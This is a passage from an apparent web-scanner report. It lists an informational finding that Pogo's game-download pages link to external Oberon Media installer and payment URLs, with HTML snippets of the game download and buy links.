<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11964850&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11964850&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe" onclick="omnitureLogDownload('117734103','oberonpogostd','Zumas Revenge','puzzle','1/8/2011 8:23:33 PM')" target="_self" ><img src="/images/games/zumas_revenge/zumas_revenge81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe" target="_self" onclick="omnitureLogDownload('117734103','oberonpogostd','Zumas Revenge','puzzle','1/8/2011 8:23:33 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe" target="_self" onclick="omnitureLogDownload('117734103','oberonpogostd','Zumas Revenge','puzzle','1/8/2011 8:23:33 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117734103&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117734103&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled2-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=bejeweled2-setup.exe" onclick="omnitureLogDownload('110272767','oberonpogostd','bejeweled2','puzzle','1/8/2011 8:23:33 PM')" target="_self" ><img src="/images/games/bejeweled2/bejeweled2_81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled2-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=bejeweled2-setup.exe" target="_self" onclick="omnitureLogDownload('110272767','oberonpogostd','bejeweled2','puzzle','1/8/2011 8:23:33 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled2-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=bejeweled2-setup.exe" target="_self" onclick="omnitureLogDownload('110272767','oberonpogostd','bejeweled2','puzzle','1/8/2011 8:23:33 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110272767&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110272767&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/buried_in_time_82138844-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=buried_in_time_82138844-setup.exe" onclick="omnitureLogDownload('118870270','oberonpogostd','Buried In Time','Strategy','1/8/2011 8:23:33 PM')" target="_self" ><img src="/images/games/BuriedInTime/BuriedInTime81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/buried_in_time_82138844-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=buried_in_time_82138844-setup.exe" target="_self" onclick="omnitureLogDownload('118870270','oberonpogostd','Buried In Time','Strategy','1/8/2011 8:23:33 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/buried_in_time_82138844-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=buried_in_time_82138844-setup.exe" target="_self" onclick="omnitureLogDownload('118870270','oberonpogostd','Buried In Time','Strategy','1/8/2011 8:23:33 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118870270&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118870270&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/virtual_villagers_4_50642057-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=virtual_villagers_4_50642057-setup.exe" onclick="omnitureLogDownload('118580497','oberonpogostd','Virtual Villagers 4','Strategy','1/8/2011 8:23:33 PM')" target="_self" ><img src="/images/games/VirtualVillagers4TheTreeofLife/VirtualVillagers4TheTreeofLife81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/virtual_villagers_4_50642057-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=virtual_villagers_4_50642057-setup.exe" target="_self" onclick="omnitureLogDownload('118580497','oberonpogostd','Virtual Villagers 4','Strategy','1/8/2011 8:23:33 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/virtual_villagers_4_50642057-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=virtual_villagers_4_50642057-setup.exe" target="_self" onclick="omnitureLogDownload('118580497','oberonpogostd','Virtual Villagers 4','Strategy','1/8/2011 8:23:33 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118580497&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118580497&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/build_a_lot_4-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=build_a_lot_4-setup.exe" onclick="omnitureLogDownload('11743417','oberonpogostd','Build a Lot 4','puzzle','1/8/2011 8:23:33 PM')" target="_self" ><img src="/images/games/build_a_lot_4/build_a_lot_481x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/build_a_lot_4-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=build_a_lot_4-setup.exe" target="_self" onclick="omnitureLogDownload('11743417','oberonpogostd','Build a Lot 4','puzzle','1/8/2011 8:23:33 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/build_a_lot_4-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=build_a_lot_4-setup.exe" target="_self" onclick="omnitureLogDownload('11743417','oberonpogostd','Build a Lot 4','puzzle','1/8/2011 8:23:33 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11743417&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11743417&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zombie_bowl-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Arcade&ln=en&ext=zombie_bowl-setup.exe" onclick="omnitureLogDownload('117842230','oberonpogostd','Zombie Bowl O Rama','arcade','1/8/2011 8:23:33 PM')" target="_self" ><img src="/images/games/Zombie_BowlORama/Zombie_BowlORama81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zombie_bowl-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Arcade&ln=en&ext=zombie_bowl-setup.exe" target="_self" onclick="omnitureLogDownload('117842230','oberonpogostd','Zombie Bowl O Rama','arcade','1/8/2011 8:23:33 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zombie_bowl-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Arcade&ln=en&ext=zombie_bowl-setup.exe" target="_self" onclick="omnitureLogDownload('117842230','oberonpogostd','Zombie Bowl O Rama','arcade','1/8/2011 8:23:33 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117842230&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117842230&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/peggle_nights-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=peggle_nights-setup.exe" onclick="omnitureLogDownload('115563203','oberonpogostd','Peggle Nights','Strategy','1/8/2011 8:23:33 PM')" target="_self" ><img src="/images/games/peggle_nights/peggle_nights81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/peggle_nights-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=peggle_nights-setup.exe" target="_self" onclick="omnitureLogDownload('115563203','oberonpogostd','Peggle Nights','Strategy','1/8/2011 8:23:33 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/peggle_nights-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=peggle_nights-setup.exe" target="_self" onclick="omnitureLogDownload('115563203','oberonpogostd','Peggle Nights','Strategy','1/8/2011 8:23:33 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115563203&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115563203&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe" onclick="omnitureLogDownload('117734103','oberonpogostd','Zumas Revenge','puzzle','1/8/2011 8:23:33 PM')" target="_self" ><img src="/images/games/zumas_revenge/zumas_revenge81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe" target="_self" onclick="omnitureLogDownload('117734103','oberonpogostd','Zumas Revenge','puzzle','1/8/2011 8:23:33 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe" target="_self" onclick="omnitureLogDownload('117734103','oberonpogostd','Zumas Revenge','puzzle','1/8/2011 8:23:33 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117734103&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117734103&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/SCRABBLE_Tour-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=SCRABBLE_Tour-setup.exe" onclick="omnitureLogDownload('118594473','oberonpogostd','Scrabble Tour','Pogo Original','1/8/2011 8:23:33 PM')" target="_self" ><img src="/images/games/SCRABBLETour/SCRABBLETour81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/SCRABBLE_Tour-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=SCRABBLE_Tour-setup.exe" target="_self" onclick="omnitureLogDownload('118594473','oberonpogostd','Scrabble Tour','Pogo Original','1/8/2011 8:23:33 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/SCRABBLE_Tour-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=SCRABBLE_Tour-setup.exe" target="_self" onclick="omnitureLogDownload('118594473','oberonpogostd','Scrabble Tour','Pogo Original','1/8/2011 8:23:33 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118594473&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118594473&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Mahjongg_dimensions_51548812-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=Mahjongg_dimensions_51548812-setup.exe" onclick="omnitureLogDownload('118444187','oberonpogostd','Mahjongg Dimensions','puzzle','1/8/2011 8:23:33 PM')" target="_self" ><img src="/images/games/MahjonggDimensionsDeluxe/MahjonggDimensionsDeluxe81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Mahjongg_dimensions_51548812-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=Mahjongg_dimensions_51548812-setup.exe" target="_self" onclick="omnitureLogDownload('118444187','oberonpogostd','Mahjongg Dimensions','puzzle','1/8/2011 8:23:33 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Mahjongg_dimensions_51548812-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=Mahjongg_dimensions_51548812-setup.exe" target="_self" onclick="omnitureLogDownload('118444187','oberonpogostd','Mahjongg Dimensions','puzzle','1/8/2011 8:23:33 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118444187&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118444187&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/skip_bo_castaway_caper_network-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Cards&ln=en&ext=skip_bo_castaway_caper_network-setup.exe" onclick="omnitureLogDownload('1180130','oberonpogostd','SKIP-BO Castaway Caper (networ','cards','1/8/2011 8:23:33 PM')" target="_self" ><img src="/images/games/skip_bo_castaway_caper/skip_bo_castaway_caper81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/skip_bo_castaway_caper_network-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Cards&ln=en&ext=skip_bo_castaway_caper_network-setup.exe" target="_self" onclick="omnitureLogDownload('1180130','oberonpogostd','SKIP-BO Castaway Caper (networ','cards','1/8/2011 8:23:33 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/skip_bo_castaway_caper_network-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Cards&ln=en&ext=skip_bo_castaway_caper_network-setup.exe" target="_self" onclick="omnitureLogDownload('1180130','oberonpogostd','SKIP-BO Castaway Caper (networ','cards','1/8/2011 8:23:33 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=1180130&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=1180130&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...

16.17. http://download-games.pogo.com/AllGames.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/AllGames.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://download-games.pogo.com/AllGames.aspx?SortBy=gameName&sDir=DESC

The response contains the following links to other domains:

http://gamecenter.cdn3.oberon-media.com/pogo/exe/World_Class_Solitaire-setup.exe?RefId=&origin=ponline_dl_img&genre=Pogo Originals&ln=en&ext=World_Class_Solitaire-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/YoudaCamper-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=YoudaCamper-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/Youda_legend_golden_bird_13258465-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=Youda_legend_golden_bird_13258465-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/Yummy_Drink_Factory-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=Yummy_Drink_Factory-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/ZOODomino-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=ZOODomino-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/ZoomBook-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=ZoomBook-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/Zuma_Deluxe-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=Zuma_Deluxe-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/world_mosaics-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=world_mosaics-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/world_mosaics_2-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=world_mosaics_2-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/world_mosaics_3_fairy_tales_09535211-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=world_mosaics_3_fairy_tales_09535211-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/world_of_goo-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=world_of_goo-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/world_riddles_seven_wonders_56231800-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=world_riddles_seven_wonders_56231800-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/world_voyage-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=world_voyage-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/yard_sale_junkie-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=yard_sale_junkie-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/yosumin-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=yosumin-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/youda_fairy_89511235-setup.exe?RefId=&origin=ponline_dl_img&genre=Time Management&ln=en&ext=youda_fairy_89511235-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/youda_farmer-setup.exe?RefId=&origin=ponline_dl_img&genre=Strategy&ln=en&ext=youda_farmer-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/youda_legend_curse_amsterdam-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=youda_legend_curse_amsterdam-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/youda_marina-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=youda_marina-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/youda_survivor_56465420-setup.exe?RefId=&origin=ponline_dl_img&genre=Time Management&ln=en&ext=youda_survivor_56465420-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/youda_sushi_chef-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=youda_sushi_chef-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/zenerchi-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=zenerchi-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/zmas_blox_75410444-setup.exe?RefId=&origin=ponline_dl_img&genre=New&ln=en&ext=zmas_blox_75410444-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/zombie_bowl-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=zombie_bowl-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11011713&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=111327327&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=113378403&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=114757800&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=114994837&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115303260&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
